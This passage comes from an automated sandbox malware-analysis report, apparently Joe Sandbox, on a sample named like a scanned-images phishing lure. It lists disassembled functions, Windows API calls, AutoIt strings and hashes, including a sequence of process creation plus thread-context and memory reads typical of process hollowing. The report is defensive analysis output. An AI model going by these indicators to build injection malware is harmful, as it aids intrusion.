                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                        • Instruction ID: 89d322aec19fb91975514609d0fb02c05be048490d4573b7f0f59bc5d4eb88f6
                                                        • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                        • Instruction Fuzzy Hash: 8451B539E00B05DFDB248FB9C98066EB7B1AFC0320F298B39F825962D2D7709D549B40
                                                        Function 00A269CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A24F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00AE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A24F6F
                                                        • _free.LIBCMT ref: 00A5E68C
                                                        • _free.LIBCMT ref: 00A5E6D3
                                                          • Part of subcall function 00A26BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A26D0D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 2861923089-1757145024
                                                        • Opcode ID: d5a9da2470b5b25d1d328beefe82962d0ac8848539b3b7191601ace4ef8b4cf8
                                                        • Instruction ID: 9292102ff812418a5860b441858f9a5e1a7c4b102d4f1d272e0b05d08d623da2
                                                        • Opcode Fuzzy Hash: d5a9da2470b5b25d1d328beefe82962d0ac8848539b3b7191601ace4ef8b4cf8
                                                        • Instruction Fuzzy Hash: 15917F71910229AFCF08EFA8DD919EDB7B4FF19310F54446AF815AB291EB319A09CB50
                                                        Function 00A235B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00A235A1,SwapMouseButtons,00000004,?), ref: 00A235D4
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00A235A1,SwapMouseButtons,00000004,?,?,?,?,00A22754), ref: 00A235F5
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00A235A1,SwapMouseButtons,00000004,?,?,?,?,00A22754), ref: 00A23617
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 30fc3cd2f74dd6a93a895551dc61d85408374a720e39bab6707aa83757e75a23
                                                        • Instruction ID: da298d7b74f131a90ded2d97f1e1c40f86921b2193c67fbf2231e5fac738b677
                                                        • Opcode Fuzzy Hash: 30fc3cd2f74dd6a93a895551dc61d85408374a720e39bab6707aa83757e75a23
                                                        • Instruction Fuzzy Hash: AA114872610228BFDF20CFA8EC40AAFB7BCEF06740F018469E905D7210E3719E419B60
                                                        Function 016912A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01691A5B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01691AF1
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01691B13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1690000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: e15f4bf7b2d8a2436c426929ce02fd6b814221300437380313034c1dc15b3d9c
                                                        • Instruction ID: f96cba5f358305b223fb1c75e70bc80098df6b18ec09fc4dfa7eb4dbef280092
                                                        • Opcode Fuzzy Hash: e15f4bf7b2d8a2436c426929ce02fd6b814221300437380313034c1dc15b3d9c
                                                        • Instruction Fuzzy Hash: F662F930A14259DBEB24CBA4CC50BDEB776EF58300F1091A9D20DEB394E7799E81CB59
                                                        Function 00A897E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A25045: _fseek.LIBCMT ref: 00A2505D
                                                          • Part of subcall function 00A899BE: _wcscmp.LIBCMT ref: 00A89AAE
                                                          • Part of subcall function 00A899BE: _wcscmp.LIBCMT ref: 00A89AC1
                                                        • _free.LIBCMT ref: 00A8992C
                                                        • _free.LIBCMT ref: 00A89933
                                                        • _free.LIBCMT ref: 00A8999E
                                                          • Part of subcall function 00A42F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00A49C64), ref: 00A42FA9
                                                          • Part of subcall function 00A42F95: GetLastError.KERNEL32(00000000,?,00A49C64), ref: 00A42FBB
                                                        • _free.LIBCMT ref: 00A899A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
                                                        • Instruction ID: eea75bd8c14b7c2a9817760c9631f1e35ce3af52ed2e7157939cdbeda68a69cb
                                                        • Opcode Fuzzy Hash: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
                                                        • Instruction Fuzzy Hash: 725149B1D04218AFDF249F64DC81AAEBBB9FF48310F1404AEF609A7241DB715A90CF58
                                                        Function 00A4493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                        • Instruction ID: 1408e565c070fbe49a54b80d8421aa4493df993ea8beb112d97587afee6cbdcb
                                                        • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                        • Instruction Fuzzy Hash: 1141B379A407069BDF28CFA9C884BAF77A6EFC83A0B24817DE855C7681D770DD409B44
                                                        Function 00A273E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A5EE62
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00A5EEAC
                                                          • Part of subcall function 00A248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A248A1,?,?,00A237C0,?), ref: 00A248CE
                                                          • Part of subcall function 00A409D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A409F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: f4637d4d6d5a9b7ee27b7db515e818c6166537300930949d58e670deeadf521f
                                                        • Instruction ID: ef35769a32bbdb11a7c02b9067e94447e4ab5ad87f49d19602cd940b28db80f9
                                                        • Opcode Fuzzy Hash: f4637d4d6d5a9b7ee27b7db515e818c6166537300930949d58e670deeadf521f
                                                        • Instruction Fuzzy Hash: 6121C6719102589BCB05DF98D845BEE7BFCAF49300F00401AE909E7241DBB45A898F91
                                                        Function 00A8901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: 372b4212d9b7141201a9b8812bca002ddbceb3962cf7f58cdd5f946e69b42141
                                                        • Instruction ID: b16a94981c95328a3b6826f118ecdb302da866c460ff35cd112ff71183bf033a
                                                        • Opcode Fuzzy Hash: 372b4212d9b7141201a9b8812bca002ddbceb3962cf7f58cdd5f946e69b42141
                                                        • Instruction Fuzzy Hash: 0A01F972C04218BEDB28C7A8C816EFE7BF8DB11301F00419AF552D2181E575A604D7A0
                                                        Function 00A89B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00A89B82
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A89B99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: 7a467a032be3f7ee3b34213adb39334b05f08561f409c2b6d43c50d932890a7d
                                                        • Instruction ID: 4a92febd5a6fb34a5b6283f6a92ab41afb6ded96b1cc4e5c00c76f9d5dd53858
                                                        • Opcode Fuzzy Hash: 7a467a032be3f7ee3b34213adb39334b05f08561f409c2b6d43c50d932890a7d
                                                        • Instruction Fuzzy Hash: 15D05E7954030EBFDB10DBD0DC0EFDA772CE704701F0046A1BE94911E1DEB455998B91
                                                        Function 00A9CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c5a2cf3aa3738c302424164ce2cf53f22ca2010961a06872e7ac88ca4104b950
                                                        • Instruction ID: 3f26a0de77b94544d4e4834f11b9c4d4e940a67795c5ff93da1126b4379be568
                                                        • Opcode Fuzzy Hash: c5a2cf3aa3738c302424164ce2cf53f22ca2010961a06872e7ac88ca4104b950
                                                        • Instruction Fuzzy Hash: 11F15D71A083019FCB14DF28C585A6ABBE5FF88314F14892DF89A9B351D731E946CF82
                                                        Function 00A2F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A403D3
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A403DB
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A403E6
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A403F1
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A403F9
                                                          • Part of subcall function 00A403A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A40401
                                                          • Part of subcall function 00A36259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A2FA90), ref: 00A362B4
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A2FB2D
                                                        • OleInitialize.OLE32(00000000), ref: 00A2FBAA
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A649F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 1986988660-0
                                                        • Opcode ID: 4c83287212a1eeda3b35a30a4358c6865ba2ccb6ebaace23d9c57f0e94551362
                                                        • Instruction ID: 82f9fe409926c945545a6ca9f46ede647276c28426a7af2782b045db99eda633
                                                        • Opcode Fuzzy Hash: 4c83287212a1eeda3b35a30a4358c6865ba2ccb6ebaace23d9c57f0e94551362
                                                        • Instruction Fuzzy Hash: 36819BB09012D18FC384EFAAEA956557BE4FBB83947108D3AE019CF2A2EB315406CF51
                                                        Function 00A243DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A24401
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A244A6
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A244C3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$_memset
                                                        • String ID:
                                                        • API String ID: 1505330794-0
                                                        • Opcode ID: e6150edc200c4d6de325a901ece60453daee3f9c0c8b21a4baae9e7cb40d603a
                                                        • Instruction ID: 265209aba12148052be7f7bb36d65a6571e28434ea637f2f2f51637aca52091c
                                                        • Opcode Fuzzy Hash: e6150edc200c4d6de325a901ece60453daee3f9c0c8b21a4baae9e7cb40d603a
                                                        • Instruction Fuzzy Hash: 003193719047518FD720EF68E884797BBF8FB59304F00093EF69A87241D7756944CB52
                                                        Function 00A4594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 00A45963
                                                          • Part of subcall function 00A4A3AB: __NMSG_WRITE.LIBCMT ref: 00A4A3D2
                                                          • Part of subcall function 00A4A3AB: __NMSG_WRITE.LIBCMT ref: 00A4A3DC
                                                        • __NMSG_WRITE.LIBCMT ref: 00A4596A
                                                          • Part of subcall function 00A4A408: GetModuleFileNameW.KERNEL32(00000000,00AE43BA,00000104,?,00000001,00000000), ref: 00A4A49A
                                                          • Part of subcall function 00A4A408: ___crtMessageBoxW.LIBCMT ref: 00A4A548
                                                          • Part of subcall function 00A432DF: ___crtCorExitProcess.LIBCMT ref: 00A432E5
                                                          • Part of subcall function 00A432DF: ExitProcess.KERNEL32 ref: 00A432EE
                                                          • Part of subcall function 00A48D68: __getptd_noexit.LIBCMT ref: 00A48D68
                                                        • RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00A41013,?), ref: 00A4598F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: 7de60c6a23935ff4cfc42ff5a20318f5b774a6d206334b8a1b03bdc3849813d6
                                                        • Instruction ID: af40e52518ff1b49be6977ec9d20f39025a2ec0ff87dc457f58356369d93455c
                                                        • Opcode Fuzzy Hash: 7de60c6a23935ff4cfc42ff5a20318f5b774a6d206334b8a1b03bdc3849813d6
                                                        • Instruction Fuzzy Hash: 2101D23EA41B15DFEA157B75E942A6E72589FD2770F10002AF500AA1C3DB709D018761
                                                        Function 00A89B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00A897D2,?,?,?,?,?,00000004), ref: 00A89B45
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A897D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00A89B5B
                                                        • CloseHandle.KERNEL32(00000000,?,00A897D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A89B62
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: db45d730df5d6dc7c58d6c1063fd394e64270b53ed2d76e642ac7a5defa5e91b
                                                        • Instruction ID: 0564dc68e0659246698f03169ca71420aae4cc4d483e51dd2177b358abb091b1
                                                        • Opcode Fuzzy Hash: db45d730df5d6dc7c58d6c1063fd394e64270b53ed2d76e642ac7a5defa5e91b
                                                        • Instruction Fuzzy Hash: ECE08632281315BFDB316BD4EC0DFDA7B18AB06761F144221FB64690E087B165129798
                                                        Function 00A88F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00A88FA5
                                                          • Part of subcall function 00A42F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00A49C64), ref: 00A42FA9
                                                          • Part of subcall function 00A42F95: GetLastError.KERNEL32(00000000,?,00A49C64), ref: 00A42FBB
                                                        • _free.LIBCMT ref: 00A88FB6
                                                        • _free.LIBCMT ref: 00A88FC8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
                                                        • Instruction ID: a5a28655bfb8c22d356a4e846bc07e8ed3b62d6711afd0f6b877e2372bc78d77
                                                        • Opcode Fuzzy Hash: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
                                                        • Instruction Fuzzy Hash: C9E012A16097114ACA24B678AE40B935BEE5F883907D8081DB50ADB142DE28FC558724
                                                        Function 00A2AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
